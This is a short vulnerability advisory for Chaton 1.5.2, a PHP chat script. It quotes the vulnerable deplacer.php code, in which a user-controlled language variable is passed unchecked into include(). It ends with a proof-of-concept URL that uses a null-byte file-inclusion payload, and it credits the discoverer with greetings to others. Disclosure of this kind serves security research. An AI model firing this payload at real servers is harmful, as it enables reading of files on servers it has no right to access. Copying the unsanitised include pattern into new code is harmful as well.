Chaton 1.5.2 – Local File Inclusion

[+] Chaton <= 1.5.2 Local File Include Vulnerability

[+] Discovered By: cr4wl3r

[+] Download: Donwload: http://easy-script.com/scripts-dl/chaton-1.5.2.zip

[+] Greetz: opt!x hacker, xoron, cyberlog, mywisdom, irvian, EA ngel, bL4Ck_3n91n3, xharu, zvtral, and all my friend

[+] Code:

if (file_exists( "lang/$chat_lang/deplacer.php")) {

include( "lang/$chat_lang/deplacer.php");

}

if ($chat_salon != $newsalon) {

if ($chat_hide == false) {

// Salle publique = Recupere le vrai nom

$nomsalle = NomSalonPublic( $newsalon);

if ($nomsalle == '') {

// Salon priv�

$salon_prive = true;

$nomsalle = $newsalon;

} else {

$salon_prive = false;

}

[+] PoC: [path]/inc/deplacer.php?chat_lang=[LFI%00]